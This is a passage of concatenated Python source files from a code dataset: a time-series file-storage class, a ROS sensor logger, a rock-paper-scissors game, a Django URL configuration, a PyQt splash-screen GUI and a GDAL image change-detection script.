self.colnames\n self[col] = df_target[col]\n \n return self\n \n \n \n def merge_with_fefs(self, fefs_another, on, target):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n return self.merge_with_df(fefs_another[on+target], on, target)\n\n \n\n def merge(self, right_obj, on, target=None, path=None, name=None):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n \"\"\"\n on: \n (self[on[0]] == right_obj[on[0]]) and \n (self[on[1]] == right_obj[on[1]]) and\n ...\n \n E.g., on=[\"cusID\",\"branch\"]\n \n target:\n - If None then all the remaining cols in right_obj will be merged\n - Else:\n \n E.g., on=[\"cusID\",\"branch\"], target=[\"gender\",\"citizen\"]\n Notice that for a unique comb of on, there cannot be more than 1 comb from the targets.\n \"\"\"\n \n \n fefs = self.__get_fefs_reference(path,name)\n\n \n assert isinstance(on,(str,list))\n if isinstance(on,list):\n assert all([ isinstance(col,str) for col in on ])\n else:\n on = [on]\n\n \n if isinstance(right_obj, pd.DataFrame):\n right_cols = list(right_obj.columns)\n elif isinstance(right_obj, self.__class__):\n \"\"\" if classes of BaseFEFS, its seq_col should be a dummy\"\"\"\n right_cols = dc(right_obj.colnames)\n right_cols.remove(right_obj.seq_col)\n else:\n assert False\n\n \n # validity of on\n assert len(set(on) - set(fefs.colnames)) == 0\n assert len(set(on) - set(right_cols)) == 0\n right_cols = list(set(right_cols) - set(on))\n \n\n # validity of target\n if target is not None:\n assert isinstance(target,(str,list))\n if isinstance(target,str):\n target = [target]\n else:\n assert all([ isinstance(col,str) for col in target ])\n assert len(set(target) - set(right_cols)) == 0\n else:\n target = right_cols\n \n\n \n # on and target should be mutually exclusive\n assert len(target) + len(on) == len(set(target+on))\n\n if isinstance(right_obj, pd.DataFrame):\n fefs = fefs.merge_with_df(right_obj, on, target)\n elif isinstance(right_obj, self.__class__):\n fefs = fefs.merge_with_fefs(right_obj, on, target)\n else:\n assert False\n \n return fefs\n #################################################### MERGE: END ####################################################\n ####################################################################################################################\n \n \n \n \n \n \n \n \n \n \n \n \n #####################################################################################################################\n ########################################## conflict resolve, optimize: BEG ##########################################\n \n def conflict_exist(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n try:\n _ = self.__no_overlapping_seq_range()\n return False\n except:\n return True\n \n \n def resolve_conflict(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n while self.conflict_exist():\n \n df_index, orders = self.dump_index_df() # already sorted by \"fr\"\n self = self.load_index_df(df_index, orders)\n \n for idx in range(len(self.pieces)-1):\n \n \n if self.frs[idx+1] < self.tos[idx]:\n\n df0 = self.dfs[idx]\n if df0 is None:\n df0 = self.__read_piece(idx)\n self.dfs[idx] = df0\n\n df1 = self.dfs[idx+1]\n if df1 is None:\n df1 = self.__read_piece(idx+1)\n self.dfs[idx+1] = df1\n\n B0 = df0[self.seq_col] < self.frs[idx+1]\n df0a = df0[B0].reset_index(drop=True)\n df0b = df0[~B0].reset_index(drop=True)\n\n B1 = df1[self.seq_col] <= self.tos[idx]\n df1a = df1[B1].reset_index(drop=True)\n df1b = df1[~B1].reset_index(drop=True)\n\n self.actions[idx] = \"delete\"\n self.actions[idx+1] = \"delete\"\n\n df_new = pd.concat([df0b,df1a]).reset_index(drop=True)\n df_new = df_new.sort_values(by=self.seq_col).reset_index(drop=True)\n \n if len(df0a) > 0:\n self += df0a\n if len(df1b) > 0:\n self += df1b\n if len(df_new) > 0:\n self += df_new\n break\n \n self.take_actions(max_level=4)\n \n return \n \n\n \n \n def optimize_files(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n while True:\n \n df_index, orders = self.dump_index_df() # already sorted by \"fr\"\n self = self.load_index_df(df_index, orders)\n \n idx = 0\n pieces_len_adjustment = 0\n while idx < len(self.pieces):\n \n if self.row_cnts[idx] >= self.max_row_per_piece:\n self.actions[idx] = \"split\"\n pieces_len_adjustment += 1\n break\n elif self.row_cnts[idx] < self.max_row_per_piece/2:\n idx_next = idx + 1\n if idx_next < len(self.pieces):\n if self.row_cnts[idx_next] + self.row_cnts[idx] < self.max_row_per_piece:\n self.actions[idx] = \"merge\"\n pieces_len_adjustment -= 1\n self.action_params[idx] = idx_next\n elif self.row_cnts[idx_next] > self.max_row_per_piece/2:\n self.actions[idx_next] = \"split\"\n pieces_len_adjustment += 1\n else:\n # better not do anything, leave it alone.\n idx += 1\n continue\n break\n \n idx += 1\n \n # \"split\" is 1, \"merge\" is 2.\n # but since after merge there will be \"delete\", which is 4, s\n # so max_level = 4.\n self.take_actions(max_level=4)\n if idx == len(self.pieces) - pieces_len_adjustment:\n break\n\n return\n\n ########################################## conflict resolve, optimize: END ##########################################\n #####################################################################################################################\n \n \n\n \n \n \n \n \n \n ####################################################################################################################\n ################################################# Read, Write: BEG #################################################\n \"\"\"\n Equals to df.read_csv\n \"\"\"\n def read(self, fullname):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n self.path, self.name = self.__decompose_fullpath(fullname)\n\n full_meta_dict_name = '/'.join([fullname, self.__class__.meta_json_name])\n dict_meta = json.load(open(full_meta_dict_name,'r')) \n self = self.load_meta(dict_meta)\n \n full_index_df_name = '/'.join([fullname, self.__class__.index_df_name])\n if self.seq_read_dtype is None:\n df_index = pd.read_csv(full_index_df_name)\n else:\n df_index = pd.read_csv(full_index_df_name, dtype={\"fr\":self.seq_read_dtype, \"to\":self.seq_read_dtype}) \n self = self.load_index_df(df_index)\n \n self.actions = [ \"\" for i in range(len(df_index)) ]\n self.action_params = [ None for i in range(len(df_index)) ]\n self.dfs = [ None for i in range(len(df_index)) ]\n self.cache = []\n return\n\n \n def write(self, fullname=None):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n if fullname is None:\n fullname = self.__compose_fullpath()\n else:\n self.path, self.name = self.__decompose_fullpath(fullname) # just to ensure the .fefs extension exits\n \n if not os.path.isdir(fullname):\n os.mkdir(fullname)\n \n # Consistency of actions check\n # should have all actions cleared\n assert not self.has_pending_actions()\n\n \n dict_meta = self.dump_meta()\n full_meta_dict_name = '/'.join([fullname, self.__class__.meta_json_name])\n json.dump(dict_meta, open(full_meta_dict_name,'w'))\n \n\n df_index, orders = self.dump_index_df()\n full_index_df_name = '/'.join([fullname, self.__class__.index_df_name])\n df_index.to_csv(full_index_df_name, index=False)\n return\n ################################################# Read, Write: END #################################################\n ####################################################################################################################\n\n \n \n def remove(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n fullname = self.__compose_fullpath()\n \n def recursive_remove(fullpath):\n for f in os.listdir(fullpath):\n fullname = \"%s/%s\"%(fullpath,f)\n if os.path.isdir(fullname):\n recursive_remove(fullname)\n else:\n os.remove(fullname)\n os.rmdir(fullpath)\n \n if os.path.isdir(fullname):\n recursive_remove(fullname)\n \n return\n\n\n \n \n \n \n# #####################################################################################################################\n# #################################################### Switch: BEG ####################################################\n# \"\"\" A completely new function \"\"\"\n \n# def switch_seq_col(self, switch_col, path, name):\n\n# \"\"\" \n# Base class should never be actually called,\n# have to be an implemented class.\n# \"\"\"\n# assert self.__class__ != BaseFEFS\n \n \n# assert self.seq_col != switch_col\n# assert switch_col in self.colnames\n \n# # Create a new FEFS in the following\n# dict_meta = self.dump_meta()\n# dict_meta[\"seq_col\"] = switch_col\n \n# assert isinstance(name, str)\n# fefs = TSFEFS.create(dict_meta, name)\n# fefs.path = path\n# fefs_fullpath = fefs.__compose_fullpath()\n# if not os.path.isdir(fefs_fullpath):\n# os.mkdir(fefs_fullpath)\n \n# \"\"\"\n# Explanation:\n# There should be no need to read in the file and changing the seq_col type,\n# since the files should have the seq_col saved as strings.\n\n# Thus a direct copy of the files from src to dst should do.\n# \"\"\" \n# for idx in range(len(self.pieces)):\n \n# piece = self.pieces[idx]\n# type_ = self.types[idx]\n# piece_fullname = self.__compose_piece_fullname(piece)\n \n# if type_ == \"csv\":\n \n# src = piece_fullname\n# dst = '/'.join([fefs_fullpath, piece])\n# os.system(\"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n \n# elif type_ == self.__class__.__name__:\n \n# sub_self = self.__class__()\n# piece_fullname += '.' + self.__class__.extension\n# sub_self.read(piece_fullname)\n \n# sub_self.switch_seq_col(switch_col, fefs_fullpath, piece)\n \n# else:\n \n# print(\"File type \\\"%s\\\" not yet implemented\"%str(type_))\n# assert False\n","repo_name":"GreekIsGood/TSFEFS","sub_path":"BaseFEFS.old.py","file_name":"BaseFEFS.old.py","file_ext":"py","file_size_in_byte":116442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7314525240","text":"#!/usr/bin/env python3\n\nimport message_filters\nimport rospy\nfrom geometry_msgs.msg import Vector3\nfrom sensor_msgs.msg import Imu\nfrom sonar.msg import Sonar\nfrom nlink_parser.msg import TofsenseFrame0\nimport os\nimport csv\nfrom threading import Lock\n\nclass logger:\n def __init__(self):\n self.filename = None\n self.csvwriter = None\n self.path = None\n self.lock = Lock()\n\n def create_csv_file(self):\n \"\"\"\n If csv file name exists, increment i and use new i in name.\n \"\"\"\n i = 0\n while os.path.exists(self.path + str(i) + \".csv\"):\n i += 1\n self.filename = self.path + str(i)+\".csv\"\n\n def csv_writer(self,write_dict):\n \"\"\"\n Thread lock is used to avoid two callbacks from accessing csvfile at the same time\n \"\"\"\n self.lock.acquire()\n self.csvwriter.writerow(write_dict)\n self.lock.release()\n\n def callback_sonar_tof(self,sonar,tof):\n now = rospy.get_time()\n self.csv_writer({\n \"time\":now,\"sensor\":\"sonar_tof\",\"tof_distance\":tof.dis,\"sonar_distance\":sonar.distance,\"confidence\":sonar.confidence\n })\n rospy.loginfo(sonar)\n rospy.loginfo(tof)\n\n def callback_tof(self,tof):\n now = rospy.get_time()\n self.csv_writer({\n \"time\":now,\"sensor\":\"tof\",\"tof_distance\":tof.dis\n })\n rospy.loginfo(tof)\n\n def callback_sonar_distance(self,sonar):\n now = rospy.get_time()\n self.csv_writer({\n \"time\":now,\"sensor\":\"sonar\",\"sonar_distance\":sonar.distance,\"confidence\":sonar.confidence\n })\n rospy.loginfo(sonar)\n \n def callback_sonar_profile(self,sonar):\n now = rospy.get_time()\n self.csv_writer({\n \"time\":now,\"sensor\":\"sonar\",\"sonar_distance\":sonar.distance,\"confidence\":sonar.confidence,\n \"transmit_duration\":sonar.transmit_duration,\"ping_number\":sonar.ping_number,\n \"scan_start\":sonar.scan_start,\"scan_length\":sonar.scan_length,\"gain_setting\":sonar.gain_setting,\n \"profile_data\":[sonar.profile_data[i] for i in range(0,len(sonar.profile_data))],\n })\n rospy.loginfo(sonar)\n \n \n def callback_imu(self,imu):\n now = rospy.get_time()\n self.csv_writer({\n \"time\":now,\"sensor\":\"imu\",\n \"accel x\":imu.linear_acceleration.x,\"accel y\":imu.linear_acceleration.y,\"accel z\":imu.linear_acceleration.z,\n \"angular_vel x\":imu.angular_velocity.x,\"angular_vel y\":imu.angular_velocity.y,\"angular_vel z\":imu.angular_velocity.z,\n })\n rospy.loginfo(imu)\n\n def start(self):\n rospy.init_node(\"logger\",anonymous=True)\n self.path = rospy.get_param(\"~csv_path\",\"/home/ubuntu/all_log_\")\n self.mode = rospy.get_param(\"~mode\",\"all\")\n self.create_csv_file()\n with open(self.filename,\"w\") as csvfile:\n if self.mode == \"all\":\n header = [\"time\",\"sensor\",\"tof_distance\",\"sonar_distance\",\"confidence\",\"accel x\",\"accel y\",\"accel z\",\"angular_vel x\",\"angular_vel y\",\"angular_vel z\"]\n self.csvwriter = csv.DictWriter(csvfile,fieldnames = header)\n self.csvwriter.writeheader()\n imu_sub = rospy.Subscriber(\"/imu/data_raw\",Imu,self.callback_imu,queue_size=1)\n\n # Code below is to time synchronize sonar and tof mesurements\n sonar_sub = message_filters.Subscriber('/sonar', Sonar)\n tof_sub = message_filters.Subscriber('/nlink_tofsense_frame0',TofsenseFrame0)\n ts = message_filters.ApproximateTimeSynchronizer([sonar_sub,tof_sub],1,0.01,allow_headerless=True)\n ts.registerCallback(self.callback_sonar_tof)\n \n elif self.mode == \"imu_tof\":\n header = [\"time\",\"sensor\",\"tof_distance\",\"accel x\",\"accel y\",\"accel z\",\"angular_vel x\",\"angular_vel y\",\"angular_vel z\"]\n self.csvwriter = csv.DictWriter(csvfile,fieldnames = header)\n self.csvwriter.writeheader()\n imu_sub = rospy.Subscriber(\"/imu/data_raw\",Imu,self.callback_imu)\n tof_sub = rospy.Subscriber('/nlink_tofsense_frame0',TofsenseFrame0,self.callback_tof)\n\n elif self.mode == \"imu\":\n header = [\"time\",\"sensor\",\"accel x\",\"accel y\",\"accel z\",\"angular_vel x\",\"angular_vel y\",\"angular_vel z\"]\n self.csvwriter = csv.DictWriter(csvfile,fieldnames = header)\n self.csvwriter.writeheader()\n imu_sub = rospy.Subscriber(\"/imu/data_raw\",Imu,self.callback_imu)\n \n elif self.mode == \"sonar\":\n header = [\"time\",\"sensor\",\"sonar_distance\",\"confidence\",\"transmit_duration\",\"ping_number\",\"scan_start\",\"scan_length\",\"gain_setting\",\"profile_data\"]\n self.csvwriter = csv.DictWriter(csvfile,fieldnames = header)\n self.csvwriter.writeheader()\n sonar_sub = rospy.Subscriber('/sonar', Sonar,self.callback_sonar_profile)\n \n elif self.mode == \"tof\":\n header = [\"time\",\"sensor\",\"tof_distance\"]\n self.csvwriter = csv.DictWriter(csvfile,fieldnames = header)\n self.csvwriter.writeheader()\n tof_sub = rospy.Subscriber('/nlink_tofsense_frame0',TofsenseFrame0,self.callback_tof)\n rospy.spin()\n \n\nif __name__ == \"__main__\":\n try:\n log = logger().start()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"SAAB-NTU/2023_UWR","sub_path":"ros_ws/src/Rpi_logger_v2/src/logger/scripts/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34011828264","text":"import random\n\ndef gamewin(comp,you):\n if comp==you:\n return 'Tie'\n elif comp=='s':\n if you=='c':\n return False\n elif you=='p':\n return True\n elif comp=='p':\n if you=='s':\n return False\n elif you=='c':\n return True\n elif comp=='c':\n if you=='p':\n return False\n elif you=='s':\n return True\n else:\n return None\n\ndef main():\n try:\n you = input(\"Your Turn : Stone(s),Paper(p),Scissor(c) : \\n\").lower()\n print(\"Computer's Turn : Stone(s),Paper(p),Scissor(c) : \")\n no = random.randint(1,3)\n if no==1:\n comp='s'\n elif no==2:\n comp='p'\n elif no==3:\n comp='c'\n\n print(\"Computer Choose : \",comp)\n print(\"You Choose : \",you)\n\n x=gamewin(comp,you)\n\n if x=='Tie':\n print(\"Game is Tie...\")\n elif x: \n print(\"You Win !, Congratulations.\")\n elif x==None:\n print(\"Please Enter Valid Input !!\")\n main()\n else:\n print(\"You Lose. Better Luck Next Time..\")\n except:\n print(\"Please Enter Valid Input !!\")\n main()\n\nmain()","repo_name":"akash-hirapara/Stone-Paper-Scissor-Game","sub_path":"Stone Paper Scissor.py","file_name":"Stone Paper Scissor.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31218629043","text":"# Custom patches\nimport patches\nfrom os.path import join, dirname\n\nfrom django.conf import settings\nfrom django.conf.urls.defaults import *\nfrom django.contrib import admin\nfrom django.contrib.sitemaps import FlatPageSitemap, GenericSitemap\nfrom django.http import HttpResponseServerError\nfrom django.template.context import RequestContext, Context\nfrom django.template.loader import render_to_string\n\nfrom discussion.views import redirect_to_view\nfrom tagging.models import Tag\nfrom blog.sitemaps import BlogSitemap, IndexSitemap, BlogTagsSitemap\nfrom lib import appcheck\n\ndef error500(request, template_name='500.html'):\n try:\n output = render_to_string(template_name, {}, RequestContext(request))\n except:\n output = \"Critical error. Administrator was notified.\"\n return HttpResponseServerError(output)\n\nhandler500 = 'urls.error500'\n\nsitemaps = {\n 'blog' : BlogSitemap,\n 'blogtags': BlogTagsSitemap,\n 'flat' : FlatPageSitemap,\n 'index' : IndexSitemap,\n}\n\ntry:\n import urls_local\n urlpatterns = urls_local.urlpatterns\nexcept ImportError:\n urlpatterns = patterns('',)\n\nadmin.autodiscover()\n\nurlpatterns += patterns(\n '',\n url(r'' , include('revcanonical.urls')),\n url(r'^admin/postimage/' , include('postimage.urls')),\n url(r'^admin/filebrowser/' , include('filebrowser.urls')),\n \n url(r'^admin/?(.*)' , admin.site.root, name='admin'),\n \n url(r'^accounts/' , include('accounts.urls')),\n url(r'^crossposting/' , include('crossposting.urls')),\n url(r'^openid/' , include('openidconsumer.urls')),\n url(r'^openidserver/' , include('openidserver.urls')),\n url(r'^%s' % settings.BLOG_URLCONF_ROOT , include('blog.urls')),\n url(r'^sitemap.xml$' , 'django.contrib.sitemaps.views.sitemap', {'sitemaps': sitemaps}),\n url(r'^xmlrpc/' , include('xmlrpc.urls')),\n url(r'^captcha/' , include('captcha.urls')),\n url(r'^robots.txt$' , include('robots.urls')),\n url(r'^feeds/' , include('feed.urls')),\n \n #mark coomment node as viewd and redirect to admin comment edit page\n url(r'^commentnode/viewed/(?P[\\d]+)/?', redirect_to_view, name='mark-comments-read'),\n \n # tinymce and admin page for blog post must on the same domain\n url(r'^tinymce/' , include('tinymce.urls')),\n)\n\nif appcheck.watchlist:\n urlpatterns += patterns('', url(r'^watchlist/', include('watchlist.urls')),)\n\nif appcheck.friends:\n urlpatterns += patterns('', url(r'^friends/', include('friends.urls')),)\n\nif settings.URL_ROOT_HANDLER:\n urlpatterns += patterns('', url(r'^$', settings.URL_ROOT_HANDLER))\n\nif appcheck.wpimport:\n urlpatterns += patterns('', url(r'^wpimport/', include('wpimport.urls')),)\n\nif appcheck.debug:\n urlpatterns += patterns('', url('', include('debug.urls')),)\n\nif appcheck.life:\n urlpatterns += patterns('', url(r'^life/', include('life.urls')),)\n\n# static pages URLs\nurlpatterns += patterns('', url(r'^/?', include('staticpages.urls')),)\n","repo_name":"gvidon/blombum","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25398507374","text":"# IMPORT QT CORE\nfrom qt_core import *\n\n# IMPORT MAIN WINDOW\nfrom gui.windows.main_window.ui_main_window import UI_MainWindow\n\n# GUI FILE\nfrom gui.windows.window_loading.ui_splash_screen import Ui_SplashScreen\nfrom codigo.contagem_e_corte import Contagem\n\n# GLOBALS\ncounter = 0\njumper = 10\n\n\n## ==> MAIN WINDOW <== ##\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"PROJETO BETA IA\")\n\n # SETUP MAIN WINDOW\n self.ui = UI_MainWindow()\n self.ui.setup_ui(self)\n\n # Toggle button\n self.ui.toggle_button.clicked.connect(self.toggle_button)\n\n # Btn home\n self.ui.btn_1.clicked.connect(self.show_page_1)\n\n # Btn widgets\n self.ui.btn_2.clicked.connect(self.show_page_2)\n\n # Btn settings\n self.ui.settings_btn.clicked.connect(self.show_page_3)\n\n # Btn Treinamento\n self.ui.btn_3.clicked.connect(self.show_page_4)\n\n # Change text\n self.ui.ui_pages.btn_change_text.clicked.connect(self.change_text)\n\n # button_select_image\n self.ui.ui_pages.pushButton_5.clicked.connect(self.select_image)\n\n\n # EXIBI A NOSSA APLICAÇÃO\n self.show()\n\n # Change text - Home Page\n def change_text(self):\n text = self.ui.ui_pages.lineEdit.text()\n new_text = \"Olá, \" + text\n self.ui.ui_pages.label_3.setText(new_text)\n\n # select_image - Classificador Page\n def select_image(self):\n import tkinter as tk\n from tkinter import filedialog\n root = tk.Tk()\n root.withdraw()\n files = filedialog.askopenfilenames()\n #print(files[0])\n con = Contagem(files[0])\n\n # Reset BTN Selection\n def reset_selection(self):\n for btn in self.ui.left_menu.findChildren(QPushButton):\n try:\n btn.set_active(False)\n except:\n pass\n\n # Btn home function\n def show_page_1(self):\n self.reset_selection()\n self.ui.pages.setCurrentWidget(self.ui.ui_pages.page_1)\n self.ui.btn_1.set_active(True)\n\n # Btn widgets function\n def show_page_2(self):\n self.reset_selection()\n self.ui.pages.setCurrentWidget(self.ui.ui_pages.page_4)\n self.ui.btn_2.set_active(True)\n\n # Btn pase gettings\n def show_page_3(self):\n self.reset_selection()\n self.ui.pages.setCurrentWidget(self.ui.ui_pages.page_2)\n self.ui.settings_btn.set_active(True)\n\n # Btn home function\n def show_page_4(self):\n self.reset_selection()\n self.ui.pages.setCurrentWidget(self.ui.ui_pages.page_3)\n self.ui.btn_3.set_active(True)\n\n # Toggle button\n def toggle_button(self):\n # Get menu width\n menu_width = self.ui.left_menu.width()\n\n # Check with\n width = 50\n if menu_width == 50:\n width = 180\n\n # Start animation\n self.animation = QPropertyAnimation(self.ui.left_menu, b\"minimumWidth\")\n self.animation.setStartValue(menu_width)\n self.animation.setEndValue(width)\n self.animation.setDuration(500)\n self.animation.setEasingCurve(QEasingCurve.InOutCirc)\n self.animation.start()\n\n## ==> SPLASHSCREEN WINDOW <== ##\nclass SplashScreen(QMainWindow):\n def __init__(self):\n QMainWindow.__init__(self)\n self.ui = Ui_SplashScreen()\n self.ui.setupUi(self)\n\n ## ==> SET INITIAL PROGRESS BAR TO (0) ZERO\n self.progressBarValue(0)\n\n ## ==> REMOVE STANDARD TITLE BAR\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint) # Remove title bar\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground) # Set background to transparent\n\n ## ==> APPLY DROP SHADOW EFFECT\n self.shadow = QGraphicsDropShadowEffect(self)\n self.shadow.setBlurRadius(20)\n self.shadow.setXOffset(0)\n self.shadow.setYOffset(0)\n self.shadow.setColor(QColor(0, 0, 0, 120))\n self.ui.circularBg.setGraphicsEffect(self.shadow)\n\n ## QTIMER ==> START\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.progress)\n # TIMER IN MILLISECONDS\n self.timer.start(15)\n\n ## SHOW ==> MAIN WINDOW\n ########################################################################\n self.show()\n ## ==> END ##\n\n ## DEF TO LOANDING\n ########################################################################\n def progress (self):\n global counter\n global jumper\n value = counter\n\n # HTML TEXT PERCENTAGE\n htmlText = \"\"\"

    {VALUE}%

    \"\"\"\n\n # REPLACE VALUE\n newHtml = htmlText.replace(\"{VALUE}\", str(jumper))\n\n if(value > jumper):\n # APPLY NEW PERCENTAGE TEXT\n self.ui.labelPercentage.setText(newHtml)\n jumper += 10\n\n # SET VALUE TO PROGRESS BAR\n # fix max value error if > than 100\n if value >= 100: value = 1.000\n self.progressBarValue(value)\n\n # CLOSE SPLASH SCREE AND OPEN APP\n if counter > 100:\n # STOP TIMER\n self.timer.stop()\n\n # SHOW MAIN WINDOW\n self.main = MainWindow()\n self.main.show()\n\n # CLOSE SPLASH SCREEN\n self.close()\n\n # INCREASE COUNTER\n counter += 0.5\n\n ## DEF PROGRESS BAR VALUE\n ########################################################################\n def progressBarValue(self, value):\n\n # PROGRESSBAR STYLESHEET BASE\n styleSheet = \"\"\"\n QFrame{\n \tborder-radius: 150px;\n \tbackground-color: qconicalgradient(cx:0.5, cy:0.5, angle:90, stop:{STOP_1} rgba(255, 0, 127, 0), stop:{STOP_2} rgba(85, 170, 255, 255));\n }\n \"\"\"\n\n # GET PROGRESS BAR VALUE, CONVERT TO FLOAT AND INVERT VALUES\n # stop works of 1.000 to 0.000\n progress = (100 - value) / 100.0\n\n # GET NEW VALUES\n stop_1 = str(progress - 0.001)\n stop_2 = str(progress)\n\n # SET VALUES TO NEW STYLESHEET\n newStylesheet = styleSheet.replace(\"{STOP_1}\", stop_1).replace(\"{STOP_2}\", stop_2)\n\n # APPLY STYLESHEET WITH NEW VALUES\n self.ui.circularProgress.setStyleSheet(newStylesheet)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n app.setWindowIcon(QIcon(\"icon.ico\"))\n window = SplashScreen()\n sys.exit(app.exec())\n\n'''\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n app.setWindowIcon(QIcon(\"icon.ico\"))\n window = MainWindow()\n sys.exit(app.exec())\n'''","repo_name":"Elias-abreu/Projeto_celulas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9743342378","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\"\"\"\n图像变化检测\n同一地区不同时间的图像进行逐像素作差,检测变化区域\n按文件夹处理\n\"\"\"\n\ntry:\n from osgeo import gdal\nexcept:\n import gdal\nimport gdalnumeric\nfrom osgeo.gdalconst import *\nfrom glob import glob\nimport os\nimport itertools\nfrom scipy import ndimage\nimport numpy as np\nimport sys\nfrom datetime import datetime\n\n\ndef get_tif_path(file1,file2):\n '''\n 返回tif/tiff对应的路径\n :param file1: 第一个文件夹\n :param file2: 第二个文件夹\n :return: 返回做匹配图像的2张图像对应路径\n '''\n file1_path = []\n [file1_path.append(glob(os.path.join(file1, '*/' * i, '*.tif'))) for i in range(3)] # 只循环3级目录\n [file1_path.append(glob(os.path.join(file1, '*/' * i, '*.tiff'))) for i in range(3)]\n file1_path = list(itertools.chain.from_iterable(file1_path)) # 转成一维list\n\n file2_path = []\n [file2_path.append(glob(os.path.join(file2, '*/' * i, '*.tif'))) for i in range(3)]\n [file2_path.append(glob(os.path.join(file2, '*/' * i, '*.tiff'))) for i in range(3)]\n file2_path = list(itertools.chain.from_iterable(file2_path)) # 转成一维list\n\n # 将file1_path 与 file2_path一一对应\n file_path=[]\n for img in file1_path:\n img_name = img.split('/')[-1].split('.')[0] # Linux 为'/' ;windows 为'\\\\'\n for img2 in file2_path:\n if img_name in img2:\n file_path.append([img,img2])\n file2_path.remove(img2)\n break\n\n return [file1_path,file_path]\n\ndef get_geoPosition(file_path):\n '''\n 解析文件夹中的所有影像,获取最终的地理位置,最左上角地理坐标和最右下角地理坐标\n :param file_path: 输入文件的tif影像路径\n :return: 地理坐标和参考系参数以及合并的图像大小\n '''\n gdal.SetConfigOption(\"GDAL_FILENAME_IS_UTF8\", \"NO\")\n gdal.AllRegister()\n\n flag = True\n\n # 循环所有图像找到最左上角地理坐标和最右下角地理坐标\n for file in file_path:\n srcDS = gdal.Open(file, GA_ReadOnly) # 只读方式打开原始影像\n geoTrans = srcDS.GetGeoTransform() # 获取地理参考6参数\n # srcPro = srcDS.GetProjection() # 获取坐标引用\n srcXSize = srcDS.RasterXSize # 宽度\n srcYSize = srcDS.RasterYSize # 高度\n\n # 原始影像的左上角坐标 (geoTrans[0],geoTrans[3])\n srcX=geoTrans[0]\n srcY=geoTrans[3]\n # 原始影像的右下角坐标(地理坐标)\n srcX2 = geoTrans[0] + srcXSize * geoTrans[1] + srcYSize * geoTrans[2]\n srcY2 = geoTrans[3] + srcXSize * geoTrans[4] + srcYSize * geoTrans[5]# Y方向的坐标 递减 geoTrans[5]是负数\n\n if flag:\n srcPro = srcDS.GetProjection()\n\n left_top_X = srcX\n left_top_Y = srcY\n right_bottom_X = srcX2\n right_bottom_Y = srcY2\n flag = False\n\n\n if left_top_X > srcX: left_top_X = srcX\n if left_top_Y < srcY: left_top_Y = srcY\n\n if right_bottom_XsrcY2:right_bottom_Y=srcY2\n\n # Create a new geomatrix for the image\n geoTrans2 = list(geoTrans)\n # 重新设置左上角地理坐标\n\n geoTrans2[0] = left_top_X\n geoTrans2[3] = left_top_Y\n\n # 所有图像合起来的图像大小\n Xsize = np.ceil((right_bottom_X - left_top_X) / geoTrans[1])\n Ysize = np.ceil((right_bottom_Y - left_top_Y) / geoTrans[5])\n\n return [geoTrans2,srcPro,Xsize,Ysize]\n\ndef Image_contrast_detection(img1_path,img2_path,img_save):\n '''\n 2张图像对比检测,返回最后的输出结果图(只能两张两张图像做对比)\n :param img1_path: 图一路径\n :param img2_path: 图二路径\n :param img_save: 输出结果保存路径\n :return: 文件夹1,2对应图像对比结果\n '''\n\n # 为了支持中文路径,请添加下面这句代码\n gdal.SetConfigOption(\"GDAL_FILENAME_IS_UTF8\", \"NO\")\n\n gdal.AllRegister() # 注册驱动\n\n # assert len(sys.argv) >= 4, \"参数不足 使用参考:\\n python test.py 图一路径 图二路径 输出结果路径\"\n\n # img1_path = sys.argv[1]\n # img2_path = sys.argv[2]\n\n img_name = img2_path.split('/')[-1].split('.')[0] # Linux 为'/' ;windows 为'\\\\'\n\n src_ds1 = gdal.Open(img1_path)\n ibands1 = src_ds1.RasterCount\n xcount1 = src_ds1.RasterXSize\n ycount1 = src_ds1.RasterYSize\n\n geoTrans1 = src_ds1.GetGeoTransform()\n srcPro1 = src_ds1.GetProjection()\n\n assert ibands1 >= 3, '%s波段数不足3' % img1_path\n\n data_type = np.float32\n\n srcband = src_ds1.GetRasterBand(1)\n # R1 = srcband.ReadAsArray(0, 0, xcount1, ycount1).astype(data_type)\n R1 = srcband.ReadRaster(0, 0, xcount1, ycount1)\n R1 = np.fromstring(R1, np.uint8)\n R1 = np.reshape(R1, [ycount1, xcount1]).astype(data_type)\n\n srcband = src_ds1.GetRasterBand(2)\n # G1 = srcband.ReadAsArray(0, 0, xcount1, 